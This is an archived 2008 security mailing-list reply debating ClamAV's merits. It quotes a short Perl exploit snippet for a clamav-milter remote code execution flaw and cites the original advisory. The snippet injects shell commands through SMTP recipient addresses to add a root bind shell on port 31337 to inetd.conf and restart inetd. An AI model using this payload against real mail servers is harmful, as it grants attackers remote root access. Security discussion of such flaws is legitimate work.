Security Incidents mailing list archives

Re: Possible Mail server compromise ?

From: Eygene Ryabinkin <rea-sec () codelabs ru>
Date: Wed, 20 Feb 2008 17:48:10 +0300

Faas, good day.

Tue, Feb 19, 2008 at 07:46:35PM +0100, Faas M. Mathiasen wrote:

ClamAV ? Lowest detection rate in the industry,


Possibly...  Where is the statistics?

no on-access scans


Not relevant to the mail scanning engine.

and an Anti-virus that was vulnerable to such bugs [1]


Not the ClamAV itself, but clamav-milter in the blackhole mode.
http://www.nruns.com/advisories/[n.runs-SA-2007.025%5D%20-%20ClamAV%20Remote%20Code%20Execution%20Advisory.txt

you consider a great success ? I don't know who you are protecting
but I hope they were not vulnerable to this :

[1]
print $sock "ehlo you\r\n";
print $sock "mail from: <>\r\n";
print $sock "rcpt to: <nobody+\"|echo '31337 stream tcp nowait root
/bin/sh -i' >> /etc/inetd.conf\"@localhost>\r\n";
print $sock "rcpt to: <nobody+\"|/etc/init.d/inetd restart\"@localhost>\r\n";
print $sock "data\r\n.\r\nquit\r\n";

-- 
Eygene

Current thread:

Re: Possible Mail server compromise ?, (continued)
- - - Re: Possible Mail server compromise ? Faas M. Mathiasen (Feb 04)
- Re: Possible Mail server compromise ? Faas M. Mathiasen (Feb 12)
  - Re: Possible Mail server compromise ? Michael Loftis (Feb 13)
  - Re: Possible Mail server compromise ? Jon Oberheide (Feb 13)
  - Re: Possible Mail server compromise ? Faas M. Mathiasen (Feb 19)
    - Re: Possible Mail server compromise ? Bob Toxen (Feb 19)
    - Re: Possible Mail server compromise ? Faas M. Mathiasen (Feb 19)
    - Re: Possible Mail server compromise ? Valdis . Kletnieks (Feb 20)
    - Re: Possible Mail server compromise ? Bob Toxen (Feb 20)
    - Re: Possible Mail server compromise ? Faas M. Mathiasen (Feb 20)
    - Re: Possible Mail server compromise ? Eygene Ryabinkin (Feb 20)
    - Re: Possible Mail server compromise ? Faas M. Mathiasen (Feb 20)
    - Re: Possible Mail server compromise ? Valdis . Kletnieks (Feb 20)
    - Re: Possible Mail server compromise ? Faas M. Mathiasen (Feb 21)
    - Re: Possible Mail server compromise ? Paul Schmehl (Feb 21)
    - Re: Possible Mail server compromise ? Jon Oberheide (Feb 20)
    - Re: Possible Mail server compromise ? Valdis . Kletnieks (Feb 20)
    - Re: Possible Mail server compromise ? Faas M. Mathiasen (Feb 20)
    - Re: Possible Mail server compromise ? Peter Kosinar (Feb 20)
    - Re: Possible Mail server compromise ? Faas M. Mathiasen (Feb 21)
    - RE: Possible Mail server compromise ? Richard C Lewis (Feb 22)

(Thread continues...)